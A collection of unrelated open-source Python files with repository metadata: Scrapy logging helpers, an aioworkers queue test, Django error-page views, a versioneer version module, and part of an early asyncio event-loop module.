    ``_scrapy_root_handler`` so a later call replaces it instead of
    stacking a second handler.
    """
    global _scrapy_root_handler
    if (_scrapy_root_handler is not None
            and _scrapy_root_handler in logging.root.handlers):
        # Remove the handler installed by a previous call.
        logging.root.removeHandler(_scrapy_root_handler)
    # Let the handler's own level do the filtering.
    logging.root.setLevel(logging.NOTSET)
    _scrapy_root_handler = _get_handler(settings)
    logging.root.addHandler(_scrapy_root_handler)
def get_scrapy_root_handler():
    """Return the root-logger handler installed by Scrapy, or None."""
    return _scrapy_root_handler
_scrapy_root_handler = None  # set by install_scrapy_root_handler()
def _get_handler(settings):
    """Return a log handler object according to settings.

    Chooses a FileHandler when LOG_FILE is set, a StreamHandler when
    LOG_ENABLED is true, and a NullHandler otherwise; then applies the
    configured format, date format, level and optional short-name filter.
    """
    log_file = settings.get('LOG_FILE')
    if log_file:
        handler = logging.FileHandler(
            log_file, encoding=settings.get('LOG_ENCODING'))
    elif settings.getbool('LOG_ENABLED'):
        handler = logging.StreamHandler()
    else:
        handler = logging.NullHandler()
    handler.setFormatter(logging.Formatter(
        fmt=settings.get('LOG_FORMAT'),
        datefmt=settings.get('LOG_DATEFORMAT')))
    handler.setLevel(settings.get('LOG_LEVEL'))
    if settings.getbool('LOG_SHORT_NAMES'):
        handler.addFilter(TopLevelFormatter(['scrapy']))
    return handler
def log_scrapy_info(settings):
    """Log the Scrapy version/bot-name banner and any overridden settings."""
    logger.info("Scrapy %(version)s started (bot: %(bot)s)",
                {'version': scrapy.__version__, 'bot': settings['BOT_NAME']})
    d = dict(overridden_settings(settings))
    logger.info("Overridden settings: %(settings)r", {'settings': d})
class StreamLogger(object):
    """Fake file-like stream object that redirects writes to a logger.

    Taken from:
    http://www.electricmonk.nl/log/2011/08/14/redirect-stdout-and-stderr-to-a-logger-in-python/
    """
    def __init__(self, logger, log_level=logging.INFO):
        self.logger = logger
        self.log_level = log_level
        self.linebuf = ''

    def write(self, buf):
        # Emit one log record per non-empty line of the written buffer.
        lines = buf.rstrip().splitlines()
        for line in lines:
            self.logger.log(self.log_level, line.rstrip())

    def flush(self):
        # Propagate flush to every handler of the wrapped logger.
        for handler in self.logger.handlers:
            handler.flush()
class LogCounterHandler(logging.Handler):
    """Record log levels count into a crawler stats object.

    Each emitted record increments the 'log_count/<LEVELNAME>' stat.
    """
    def __init__(self, crawler, *args, **kwargs):
        super(LogCounterHandler, self).__init__(*args, **kwargs)
        self.crawler = crawler

    def emit(self, record):
        stat_name = 'log_count/{}'.format(record.levelname)
        self.crawler.stats.inc_value(stat_name)
def logformatter_adapter(logkws):
    """Adapt a LogFormatter result dict to logger.log positional args.

    Takes the dictionary produced by LogFormatter methods and returns a
    ``(level, message, args)`` tuple, warning about deprecated or missing
    keys for backward compatibility.
    """
    missing = {'level', 'msg', 'args'} - set(logkws)
    if missing:
        warnings.warn('Missing keys in LogFormatter method',
                      ScrapyDeprecationWarning)
    if 'format' in logkws:
        warnings.warn('`format` key in LogFormatter methods has been '
                      'deprecated, use `msg` instead',
                      ScrapyDeprecationWarning)
    level = logkws.get('level', logging.INFO)
    message = logkws.get('format', logkws.get('msg'))
    # An empty 'args' dict doesn't play well in logger.log calls, so fall
    # back to passing the whole dict in that case.
    args = logkws['args'] if logkws.get('args') else logkws
    return (level, message, args)
|
{
"content_hash": "624d53c9b516c0d97a39c5fba7bc67ba",
"timestamp": "",
"source": "github",
"line_count": 201,
"max_line_length": 99,
"avg_line_length": 31.761194029850746,
"alnum_prop": 0.6666666666666666,
"repo_name": "shaform/scrapy",
"id": "6ceb61a824b3b4687ee1f6304a02e9b51bcbec2b",
"size": "6409",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "scrapy/utils/log.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "2076"
},
{
"name": "Python",
"bytes": "1307384"
},
{
"name": "Roff",
"bytes": "2010"
},
{
"name": "Shell",
"bytes": "258"
}
],
"symlink_target": ""
}
|
import io
import os
from queue import Queue
from aioworkers import utils
from aioworkers.core.config import Config
from aioworkers.core.context import Context
from aioworkers.queue import proxy
async def test_q(event_loop):
    """A ProxyQueue forwards put/get to the plain queue.Queue it wraps."""
    conf = Config()
    conf.update({'q.cls': utils.import_uri(proxy.ProxyQueue)})
    async with Context(conf, loop=event_loop) as ctx:
        ctx.q.set_queue(Queue())
        await ctx.q.put(1)
        # The value round-trips through the wrapped queue.
        assert 1 == await ctx.q.get()
async def test_plq(event_loop):
    """A PipeLineQueue with 'newline:str' format reads newline-delimited
    strings from its reader and writes newline-terminated strings to its
    writer.
    """
    conf = Config()
    conf.update(
        {
            'q.cls': utils.import_uri(proxy.PipeLineQueue),
            'q.format': 'newline:str',
        }
    )
    async with Context(conf, loop=event_loop) as ctx:
        nl = os.linesep.encode()
        fin = io.BytesIO(b'123' + nl)
        fout = io.BytesIO()
        ctx.q.set_reader(fin)
        ctx.q.set_writer(fout)
        # get() decodes one newline-terminated record from the reader.
        assert '123' == await ctx.q.get()
        # put() encodes the value and appends the platform line separator.
        await ctx.q.put('1')
        assert b'1' + nl == fout.getvalue()
|
{
"content_hash": "a9df50211e53743188bc190283a01634",
"timestamp": "",
"source": "github",
"line_count": 38,
"max_line_length": 62,
"avg_line_length": 26.026315789473685,
"alnum_prop": 0.6056622851365016,
"repo_name": "aioworkers/aioworkers",
"id": "a5471af8e3458301df05eb3b610f97ab178c5929",
"size": "989",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_queue_proxy.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "303"
},
{
"name": "Python",
"bytes": "220824"
}
],
"symlink_target": ""
}
|
from . import registration
from . import user
from . import test
from . import hype
from . import organize
from . import mentor
from . import judge
from .index import IndexPage
from .help import HelpPage
from .links.index import LinksPage
from .hacks.index import HacksPage
from django.shortcuts import render
def handler404(request):
    """Render the custom 404 page with the proper status code."""
    page = render(request, 'error/404/index.html')
    page.status_code = 404
    return page
def handler500(request):
    """Render the custom 500 page with the proper status code."""
    page = render(request, 'error/500/index.html')
    page.status_code = 500
    return page
|
{
"content_hash": "ed0709e25f6016a240b344d632533e14",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 54,
"avg_line_length": 24,
"alnum_prop": 0.7534722222222222,
"repo_name": "andrewsosa/hackfsu_com",
"id": "663b02fc8d8017c92ee1cdb0161d14b277dbaeef",
"size": "576",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "api/webapp/views/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "81944"
},
{
"name": "HTML",
"bytes": "88639"
},
{
"name": "JavaScript",
"bytes": "127887"
},
{
"name": "Python",
"bytes": "279510"
},
{
"name": "Shell",
"bytes": "897"
}
],
"symlink_target": ""
}
|
"""Git implementation of _version.py."""
import errno
import os
import re
import subprocess
import sys
def get_keywords():
    """Get the keywords needed to look up the version information."""
    # These placeholder strings are substituted by git during git-archive.
    # setup.py/versioneer.py greps for the variable names, so each must
    # stay defined on a line of its own; _version.py just calls
    # get_keywords().
    git_refnames = "$Format:%d$"
    git_full = "$Format:%H$"
    git_date = "$Format:%ci$"
    return {"refnames": git_refnames, "full": git_full, "date": git_date}
class VersioneerConfig:
    """Container for Versioneer configuration parameters."""
    # Attributes (VCS, style, tag_prefix, parentdir_prefix,
    # versionfile_source, verbose) are assigned in get_config().
def get_config():
    """Create, populate and return the VersioneerConfig() object."""
    # These values are filled in when 'setup.py versioneer' writes
    # _version.py.
    config = VersioneerConfig()
    config.VCS = "git"
    config.style = "pep440"
    config.tag_prefix = "v"
    config.parentdir_prefix = "micom-"
    config.versionfile_source = "micom/_version.py"
    config.verbose = False
    return config
class NotThisMethod(Exception):
    """Exception raised if a method is not valid for the current scenario.

    Signals that one version-discovery strategy (keywords, parent
    directory, git describe) failed and the caller should try another.
    """
LONG_VERSION_PY = {}
HANDLERS = {}
def register_vcs_handler(vcs, method):  # decorator
    """Decorator to mark a method as the handler for a particular VCS."""
    def decorate(f):
        """Store f in HANDLERS[vcs][method] and return it unchanged."""
        HANDLERS.setdefault(vcs, {})[method] = f
        return f
    return decorate
def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False,
                env=None):
    """Call the given command(s).

    Tries each candidate executable in *commands* (e.g. 'git' vs
    'git.cmd' on Windows) until one spawns, then runs it with *args*.
    Returns ``(stdout, returncode)``; stdout is None when no candidate
    could be started or the process failed to run.
    """
    assert isinstance(commands, list)
    p = None
    for c in commands:
        try:
            dispcmd = str([c] + args)
            # remember shell=False, so use git.cmd on windows, not just git
            p = subprocess.Popen([c] + args, cwd=cwd, env=env,
                                 stdout=subprocess.PIPE,
                                 stderr=(subprocess.PIPE if hide_stderr
                                         else None))
            break
        except EnvironmentError:
            # py2-compatible way to grab the exception instance
            e = sys.exc_info()[1]
            if e.errno == errno.ENOENT:
                # candidate not installed; try the next name
                continue
            if verbose:
                print("unable to run %s" % dispcmd)
                print(e)
            return None, None
    else:
        # loop exhausted without a successful Popen
        if verbose:
            print("unable to find command, tried %s" % (commands,))
        return None, None
    stdout = p.communicate()[0].strip()
    if sys.version_info[0] >= 3:
        stdout = stdout.decode()
    if p.returncode != 0:
        if verbose:
            print("unable to run %s (error)" % dispcmd)
            print("stdout was %s" % stdout)
        return None, p.returncode
    return stdout, p.returncode
def versions_from_parentdir(parentdir_prefix, root, verbose):
    """Try to determine the version from the parent directory name.

    Source tarballs conventionally unpack into a directory that includes
    both the project name and a version string. Walks up to two extra
    directory levels looking for a suitably prefixed name.

    :raises NotThisMethod: when no candidate directory matches.
    """
    tried = []
    for _ in range(3):
        dirname = os.path.basename(root)
        if dirname.startswith(parentdir_prefix):
            # Whatever follows the prefix is the version string.
            return {"version": dirname[len(parentdir_prefix):],
                    "full-revisionid": None,
                    "dirty": False, "error": None, "date": None}
        tried.append(root)
        root = os.path.dirname(root)  # up a level
    if verbose:
        print("Tried directories %s but none started with prefix %s" %
              (str(tried), parentdir_prefix))
    raise NotThisMethod("rootdir doesn't start with parentdir_prefix")
@register_vcs_handler("git", "get_keywords")
def git_get_keywords(versionfile_abs):
"""Extract version information from the given file."""
# the code embedded in _version.py can just fetch the value of these
# keywords. When used from setup.py, we don't want to import _version.py,
# so we do it with a regexp instead. This function is not used from
# _version.py.
keywords = {}
try:
f = open(versionfile_abs, "r")
for line in f.readlines():
if line.strip().startswith("git_refnames ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["refnames"] = mo.group(1)
if line.strip().startswith("git_full ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["full"] = mo.group(1)
if line.strip().startswith("git_date ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["date"] = mo.group(1)
f.close()
except EnvironmentError:
pass
return keywords
@register_vcs_handler("git", "keywords")
def git_versions_from_keywords(keywords, tag_prefix, verbose):
"""Get version information from git keywords."""
if not keywords:
raise NotThisMethod("no keywords at all, weird")
date = keywords.get("date")
if date is not None:
# git-2.2.0 added "%cI", which expands to an ISO-8601 -compliant
# datestamp. However we prefer "%ci" (which expands to an "ISO-8601
# -like" string, which we must then edit to make compliant), because
# it's been around since git-1.5.3, and it's too difficult to
# discover which version we're using, or to work around using an
# older one.
date = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
refnames = keywords["refnames"].strip()
if refnames.startswith("$Format"):
if verbose:
print("keywords are unexpanded, not using")
raise NotThisMethod("unexpanded keywords, not a git-archive tarball")
refs = set([r.strip() for r in refnames.strip("()").split(",")])
# starting in git-1.8.3, tags are listed as "tag: foo-1.0" instead of
# just "foo-1.0". If we see a "tag: " prefix, prefer those.
TAG = "tag: "
tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)])
if not tags:
# Either we're using git < 1.8.3, or there really are no tags. We use
# a heuristic: assume all version tags have a digit. The old git %d
# expansion behaves like git log --decorate=short and strips out the
# refs/heads/ and refs/tags/ prefixes that would let us distinguish
# between branches and tags. By ignoring refnames without digits, we
# filter out many common branch names like "release" and
# "stabilization", as well as "HEAD" and "master".
tags = set([r for r in refs if re.search(r'\d', r)])
if verbose:
print("discarding '%s', no digits" % ",".join(refs - tags))
if verbose:
print("likely tags: %s" % ",".join(sorted(tags)))
for ref in sorted(tags):
# sorting will prefer e.g. "2.0" over "2.0rc1"
if ref.startswith(tag_prefix):
r = ref[len(tag_prefix):]
if verbose:
print("picking %s" % r)
return {"version": r,
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": None,
"date": date}
# no suitable tags, so version is "0+unknown", but full hex is still there
if verbose:
print("no suitable tags, using unknown + full revision id")
return {"version": "0+unknown",
"full-revisionid": keywords["full"].strip(),
"dirty": False, "error": "no suitable tags", "date": None}
@register_vcs_handler("git", "pieces_from_vcs")
def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command):
    """Get version from 'git describe' in the root of the source tree.

    This only gets called if the git-archive 'subst' keywords were *not*
    expanded, and _version.py hasn't already been rewritten with a short
    version string, meaning we're inside a checked out source tree.

    Returns a "pieces" dict with keys: long, short, error, dirty,
    closest-tag, distance, date.  Raises NotThisMethod when git is not
    usable here so the caller can fall back to another strategy.
    """
    GITS = ["git"]
    if sys.platform == "win32":
        # on Windows the git wrappers may be .cmd or .exe; try both
        GITS = ["git.cmd", "git.exe"]
    out, rc = run_command(GITS, ["rev-parse", "--git-dir"], cwd=root,
                          hide_stderr=True)
    if rc != 0:
        if verbose:
            print("Directory %s not under git control" % root)
        raise NotThisMethod("'git rev-parse --git-dir' returned error")
    # if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty]
    # if there isn't one, this yields HEX[-dirty] (no NUM)
    describe_out, rc = run_command(GITS, ["describe", "--tags", "--dirty",
                                          "--always", "--long",
                                          "--match", "%s*" % tag_prefix],
                                   cwd=root)
    # --long was added in git-1.5.5
    if describe_out is None:
        raise NotThisMethod("'git describe' failed")
    describe_out = describe_out.strip()
    full_out, rc = run_command(GITS, ["rev-parse", "HEAD"], cwd=root)
    if full_out is None:
        raise NotThisMethod("'git rev-parse' failed")
    full_out = full_out.strip()
    pieces = {}
    pieces["long"] = full_out
    pieces["short"] = full_out[:7]  # maybe improved later
    pieces["error"] = None
    # parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty]
    # TAG might have hyphens.
    git_describe = describe_out
    # look for -dirty suffix
    dirty = git_describe.endswith("-dirty")
    pieces["dirty"] = dirty
    if dirty:
        # strip the -dirty marker before parsing the rest
        git_describe = git_describe[:git_describe.rindex("-dirty")]
    # now we have TAG-NUM-gHEX or HEX
    if "-" in git_describe:
        # TAG-NUM-gHEX
        mo = re.search(r'^(.+)-(\d+)-g([0-9a-f]+)$', git_describe)
        if not mo:
            # unparseable. Maybe git-describe is misbehaving?
            pieces["error"] = ("unable to parse git-describe output: '%s'"
                               % describe_out)
            return pieces
        # tag
        full_tag = mo.group(1)
        if not full_tag.startswith(tag_prefix):
            if verbose:
                fmt = "tag '%s' doesn't start with prefix '%s'"
                print(fmt % (full_tag, tag_prefix))
            pieces["error"] = ("tag '%s' doesn't start with prefix '%s'"
                               % (full_tag, tag_prefix))
            return pieces
        pieces["closest-tag"] = full_tag[len(tag_prefix):]
        # distance: number of commits since tag
        pieces["distance"] = int(mo.group(2))
        # commit: short hex revision ID
        pieces["short"] = mo.group(3)
    else:
        # HEX: no tags
        pieces["closest-tag"] = None
        count_out, rc = run_command(GITS, ["rev-list", "HEAD", "--count"],
                                    cwd=root)
        pieces["distance"] = int(count_out)  # total number of commits
    # commit date: see ISO-8601 comment in git_versions_from_keywords()
    date = run_command(GITS, ["show", "-s", "--format=%ci", "HEAD"],
                       cwd=root)[0].strip()
    pieces["date"] = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
    return pieces
def plus_or_dot(pieces):
    """Return the separator for a local-version segment.

    "." when the closest tag already contains a "+" (i.e. already has a
    local segment), otherwise "+".
    """
    return "." if "+" in pieces.get("closest-tag", "") else "+"
def render_pep440(pieces):
    """Build the PEP 440 version string with a post-release local segment.

    Goal: TAG[+DISTANCE.gHEX[.dirty]].  A tagged build that is then
    dirtied renders as TAG+0.gHEX.dirty.

    Exceptions:
    1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty]
    """
    tag = pieces["closest-tag"]
    if not tag:
        # exception #1: no tag at all
        version = "0+untagged.%d.g%s" % (pieces["distance"], pieces["short"])
        return version + ".dirty" if pieces["dirty"] else version
    version = tag
    if pieces["distance"] or pieces["dirty"]:
        # "." if the tag already carries a "+" local segment, else "+"
        sep = "." if "+" in tag else "+"
        version += "%s%d.g%s" % (sep, pieces["distance"], pieces["short"])
        if pieces["dirty"]:
            version += ".dirty"
    return version
def render_pep440_pre(pieces):
    """TAG[.post.devDISTANCE] -- no -dirty marker.

    Exceptions:
    1: no tags. 0.post.devDISTANCE
    """
    tag = pieces["closest-tag"]
    if not tag:
        # exception #1
        return "0.post.dev%d" % pieces["distance"]
    if not pieces["distance"]:
        return tag
    return "%s.post.dev%d" % (tag, pieces["distance"])
def render_pep440_post(pieces):
    """TAG[.postDISTANCE[.dev0]+gHEX] .

    ".dev0" marks a dirty tree.  Note that .dev0 sorts backwards (a dirty
    tree appears "older" than the matching clean one), but you shouldn't
    be releasing software with -dirty anyway.

    Exceptions:
    1: no tags. 0.postDISTANCE[.dev0]
    """
    tag = pieces["closest-tag"]
    distance = pieces["distance"]
    dirty = pieces["dirty"]
    if not tag:
        # exception #1: distance and hash are always rendered
        out = "0.post%d" % distance
        if dirty:
            out += ".dev0"
        return out + "+g%s" % pieces["short"]
    if not (distance or dirty):
        return tag
    out = "%s.post%d" % (tag, distance)
    if dirty:
        out += ".dev0"
    # "." if the tag already carries a "+" local segment, else "+"
    sep = "." if "+" in tag else "+"
    return out + sep + "g%s" % pieces["short"]
def render_pep440_old(pieces):
    """TAG[.postDISTANCE[.dev0]] .

    The ".dev0" means dirty.

    Exceptions:
    1: no tags. 0.postDISTANCE[.dev0]
    """
    tag = pieces["closest-tag"]
    suffix = ""
    if not tag:
        # exception #1: distance is always rendered
        tag = "0"
        suffix = ".post%d" % pieces["distance"]
    elif pieces["distance"] or pieces["dirty"]:
        suffix = ".post%d" % pieces["distance"]
    if suffix and pieces["dirty"]:
        suffix += ".dev0"
    return tag + suffix
def render_git_describe(pieces):
    """TAG[-DISTANCE-gHEX][-dirty].

    Mimics 'git describe --tags --dirty --always'.

    Exceptions:
    1: no tags. HEX[-dirty] (note: no 'g' prefix)
    """
    tag = pieces["closest-tag"]
    if tag:
        out = tag
        if pieces["distance"]:
            out += "-%d-g%s" % (pieces["distance"], pieces["short"])
    else:
        # exception #1
        out = pieces["short"]
    return out + "-dirty" if pieces["dirty"] else out
def render_git_describe_long(pieces):
    """TAG-DISTANCE-gHEX[-dirty].

    Mimics 'git describe --tags --dirty --always --long'; the
    distance/hash pair is rendered unconditionally.

    Exceptions:
    1: no tags. HEX[-dirty] (note: no 'g' prefix)
    """
    tag = pieces["closest-tag"]
    if tag:
        out = "%s-%d-g%s" % (tag, pieces["distance"], pieces["short"])
    else:
        # exception #1
        out = pieces["short"]
    return out + "-dirty" if pieces["dirty"] else out
def render(pieces, style):
    """Render the given version pieces into the requested style."""
    if pieces["error"]:
        # upstream parsing failed; report the error verbatim
        return {"version": "unknown",
                "full-revisionid": pieces.get("long"),
                "dirty": None,
                "error": pieces["error"],
                "date": None}
    if not style or style == "default":
        style = "pep440"  # the default
    # dispatch table instead of an if/elif chain
    renderers = {"pep440": render_pep440,
                 "pep440-pre": render_pep440_pre,
                 "pep440-post": render_pep440_post,
                 "pep440-old": render_pep440_old,
                 "git-describe": render_git_describe,
                 "git-describe-long": render_git_describe_long}
    renderer = renderers.get(style)
    if renderer is None:
        raise ValueError("unknown style '%s'" % style)
    return {"version": renderer(pieces),
            "full-revisionid": pieces["long"],
            "dirty": pieces["dirty"],
            "error": None,
            "date": pieces.get("date")}
def get_versions():
    """Get version information or return default if unable to do so."""
    # I am in _version.py, which lives at ROOT/VERSIONFILE_SOURCE. If we have
    # __file__, we can work backwards from there to the root. Some
    # py2exe/bbfreeze/non-CPython implementations don't do __file__, in which
    # case we can only use expanded keywords.
    cfg = get_config()
    verbose = cfg.verbose
    # Strategy 1: expanded git-archive keywords embedded in this file.
    try:
        return git_versions_from_keywords(get_keywords(), cfg.tag_prefix,
                                          verbose)
    except NotThisMethod:
        pass
    try:
        root = os.path.realpath(__file__)
        # versionfile_source is the relative path from the top of the source
        # tree (where the .git directory might live) to this file. Invert
        # this to find the root from __file__.
        for i in cfg.versionfile_source.split('/'):
            root = os.path.dirname(root)
    except NameError:
        # __file__ is unavailable (e.g. frozen interpreters); nothing to do.
        return {"version": "0+unknown", "full-revisionid": None,
                "dirty": None,
                "error": "unable to find root of source tree",
                "date": None}
    # Strategy 2: ask git directly via 'git describe'.
    try:
        pieces = git_pieces_from_vcs(cfg.tag_prefix, root, verbose)
        return render(pieces, cfg.style)
    except NotThisMethod:
        pass
    # Strategy 3: infer the version from the parent directory name.
    try:
        if cfg.parentdir_prefix:
            return versions_from_parentdir(cfg.parentdir_prefix, root, verbose)
    except NotThisMethod:
        pass
    # All strategies failed.
    return {"version": "0+unknown", "full-revisionid": None,
            "dirty": None,
            "error": "unable to compute version", "date": None}
|
{
"content_hash": "1376c6d562e0731427752ed9568aaf31",
"timestamp": "",
"source": "github",
"line_count": 510,
"max_line_length": 79,
"avg_line_length": 35.24313725490196,
"alnum_prop": 0.5696561700233671,
"repo_name": "cdiener/micom",
"id": "1722947cc151adebe4fd3e4f7725dc4a05900397",
"size": "18449",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "micom/_version.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "838"
},
{
"name": "Python",
"bytes": "156032"
}
],
"symlink_target": ""
}
|
"""Event loop and event loop policy."""
__all__ = ['AbstractEventLoopPolicy',
'AbstractEventLoop', 'AbstractServer',
'Handle', 'TimerHandle',
'get_event_loop_policy', 'set_event_loop_policy',
'get_event_loop', 'set_event_loop', 'new_event_loop',
'get_child_watcher', 'set_child_watcher',
]
import subprocess
import threading
import socket
class Handle:
    """Object returned by callback registration methods."""

    __slots__ = ['_callback', '_args', '_cancelled', '_loop']

    def __init__(self, callback, args, loop):
        assert not isinstance(callback, Handle), 'A Handle is not a callback'
        self._loop = loop
        self._callback = callback
        self._args = args
        self._cancelled = False

    def __repr__(self):
        text = 'Handle({}, {})'.format(self._callback, self._args)
        return text + '<cancelled>' if self._cancelled else text

    def cancel(self):
        """Mark this handle as cancelled."""
        self._cancelled = True

    def _run(self):
        """Invoke the callback, routing any exception to the loop's handler."""
        try:
            self._callback(*self._args)
        except Exception as exc:
            context = {
                'message': 'Exception in callback {}{!r}'.format(
                    self._callback, self._args),
                'exception': exc,
                'handle': self,
            }
            self._loop.call_exception_handler(context)
        self = None  # Needed to break cycles when an exception occurs.
class TimerHandle(Handle):
    """Handle for callbacks scheduled at a specific loop time."""

    __slots__ = ['_when']

    def __init__(self, when, callback, args, loop):
        assert when is not None
        super().__init__(callback, args, loop)
        self._when = when

    def __repr__(self):
        text = 'TimerHandle({}, {}, {})'.format(self._when,
                                                self._callback,
                                                self._args)
        return text + '<cancelled>' if self._cancelled else text

    def __hash__(self):
        # Hash only on the scheduled time (matches ordering semantics).
        return hash(self._when)

    def __lt__(self, other):
        return self._when < other._when

    def __le__(self, other):
        # True when strictly earlier, otherwise defer to __eq__ (which may
        # return NotImplemented for foreign types).
        return True if self._when < other._when else self.__eq__(other)

    def __gt__(self, other):
        return self._when > other._when

    def __ge__(self, other):
        return True if self._when > other._when else self.__eq__(other)

    def __eq__(self, other):
        if not isinstance(other, TimerHandle):
            return NotImplemented
        return (self._when == other._when and
                self._callback == other._callback and
                self._args == other._args and
                self._cancelled == other._cancelled)

    def __ne__(self, other):
        equal = self.__eq__(other)
        return NotImplemented if equal is NotImplemented else not equal
class AbstractServer:
    """Abstract server returned by create_server()."""

    def close(self):
        """Stop serving; existing connections stay open."""
        # NOTE: these stubs return NotImplemented rather than raising
        # NotImplementedError, unlike the event loop stubs below.
        return NotImplemented

    def wait_closed(self):
        """Coroutine that waits until the service is fully closed."""
        return NotImplemented
class AbstractEventLoop:
    """Abstract event loop."""

    # -- Running and stopping the event loop ------------------------------

    def run_forever(self):
        """Run the event loop until stop() is called."""
        raise NotImplementedError

    def run_until_complete(self, future):
        """Run until *future* is done; return its result or raise its
        exception."""
        raise NotImplementedError

    def stop(self):
        """Stop the event loop as soon as reasonable.

        How soon is implementation-dependent, but no further I/O
        callbacks should be scheduled.
        """
        raise NotImplementedError

    def is_running(self):
        """Return whether the event loop is currently running."""
        raise NotImplementedError

    def close(self):
        """Close the loop (which must not be running).

        Idempotent and irreversible; no other methods may be called
        after this one.
        """
        raise NotImplementedError

    # -- Scheduling callbacks; all of these return Handles ----------------

    def call_soon(self, callback, *args):
        # Scheduling "soon" is scheduling with zero delay.
        return self.call_later(0, callback, *args)

    def call_later(self, delay, callback, *args):
        raise NotImplementedError

    def call_at(self, when, callback, *args):
        raise NotImplementedError

    def time(self):
        raise NotImplementedError

    # -- Interacting with threads -----------------------------------------

    def call_soon_threadsafe(self, callback, *args):
        raise NotImplementedError

    def run_in_executor(self, executor, callback, *args):
        raise NotImplementedError

    def set_default_executor(self, executor):
        raise NotImplementedError

    # -- Network I/O methods returning Futures ----------------------------

    def getaddrinfo(self, host, port, *, family=0, type=0, proto=0, flags=0):
        raise NotImplementedError

    def getnameinfo(self, sockaddr, flags=0):
        raise NotImplementedError

    def create_connection(self, protocol_factory, host=None, port=None, *,
                          ssl=None, family=0, proto=0, flags=0, sock=None,
                          local_addr=None, server_hostname=None):
        raise NotImplementedError

    def create_server(self, protocol_factory, host=None, port=None, *,
                      family=socket.AF_UNSPEC, flags=socket.AI_PASSIVE,
                      sock=None, backlog=100, ssl=None, reuse_address=None):
        """Coroutine: create a TCP server bound to *host* and *port*.

        Returns a Server object which can be used to stop the service.

        - host: an empty string or None binds all interfaces; a list of
          multiple sockets may then be returned (most likely one IPv4
          and one IPv6).
        - family: AF_INET or AF_INET6 to force a socket family; by
          default it is determined from host (AF_UNSPEC).
        - flags: a bitmask for getaddrinfo().
        - sock: optionally a preexisting socket object to use.
        - backlog: maximum number of queued connections passed to
          listen() (defaults to 100).
        - ssl: an SSLContext to enable SSL over the accepted
          connections.
        - reuse_address: tells the kernel to reuse a local socket in
          TIME_WAIT state, without waiting for its natural timeout to
          expire; if not specified it is automatically True on UNIX.
        """
        raise NotImplementedError

    def create_unix_connection(self, protocol_factory, path, *,
                               ssl=None, sock=None,
                               server_hostname=None):
        raise NotImplementedError

    def create_unix_server(self, protocol_factory, path, *,
                           sock=None, backlog=100, ssl=None):
        """Coroutine: create a UNIX domain socket server.

        Returns a Server object which can be used to stop the service.

        - path: a str, the file system path to bind the server socket to.
        - sock: optionally a preexisting socket object to use.
        - backlog: maximum number of queued connections passed to
          listen() (defaults to 100).
        - ssl: an SSLContext to enable SSL over the accepted
          connections.
        """
        raise NotImplementedError

    def create_datagram_endpoint(self, protocol_factory,
                                 local_addr=None, remote_addr=None, *,
                                 family=0, proto=0, flags=0):
        raise NotImplementedError

    # -- Pipes and subprocesses -------------------------------------------

    def connect_read_pipe(self, protocol_factory, pipe):
        """Register a read pipe in the event loop.

        protocol_factory should instantiate an object with the Protocol
        interface; *pipe* is a file-like object already switched to
        non-blocking mode.  Returns a (transport, protocol) pair where
        the transport supports the ReadTransport interface.
        """
        # A file-like object (rather than a raw fd) is accepted because the
        # loop must own the pipe and close it when the transport finishes;
        # passing f.fileno() while also closing f elsewhere leads to
        # confusing errors.
        raise NotImplementedError

    def connect_write_pipe(self, protocol_factory, pipe):
        """Register a write pipe in the event loop.

        protocol_factory should instantiate an object with the
        BaseProtocol interface; *pipe* is a file-like object already
        switched to non-blocking mode.  Returns a (transport, protocol)
        pair where the transport supports the WriteTransport interface.
        """
        # Same pipe-ownership rationale as connect_read_pipe().
        raise NotImplementedError

    def subprocess_shell(self, protocol_factory, cmd, *, stdin=subprocess.PIPE,
                         stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                         **kwargs):
        raise NotImplementedError

    def subprocess_exec(self, protocol_factory, *args, stdin=subprocess.PIPE,
                        stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                        **kwargs):
        raise NotImplementedError

    # -- Ready-based callback registration --------------------------------
    # The add_*() methods return None; the remove_*() methods return True
    # if something was removed, False if there was nothing to delete.

    def add_reader(self, fd, callback, *args):
        raise NotImplementedError

    def remove_reader(self, fd):
        raise NotImplementedError

    def add_writer(self, fd, callback, *args):
        raise NotImplementedError

    def remove_writer(self, fd):
        raise NotImplementedError

    # -- Completion-based socket I/O returning Futures --------------------

    def sock_recv(self, sock, nbytes):
        raise NotImplementedError

    def sock_sendall(self, sock, data):
        raise NotImplementedError

    def sock_connect(self, sock, address):
        raise NotImplementedError

    def sock_accept(self, sock):
        raise NotImplementedError

    # -- Signal handling --------------------------------------------------

    def add_signal_handler(self, sig, callback, *args):
        raise NotImplementedError

    def remove_signal_handler(self, sig):
        raise NotImplementedError

    # -- Error handlers ---------------------------------------------------

    def set_exception_handler(self, handler):
        raise NotImplementedError

    def default_exception_handler(self, context):
        raise NotImplementedError

    def call_exception_handler(self, context):
        raise NotImplementedError

    # -- Debug flag management --------------------------------------------

    def get_debug(self):
        raise NotImplementedError

    def set_debug(self, enabled):
        raise NotImplementedError
class AbstractEventLoopPolicy:
    """Abstract policy for accessing the event loop."""

    def get_event_loop(self):
        """Return the event loop for the current context."""
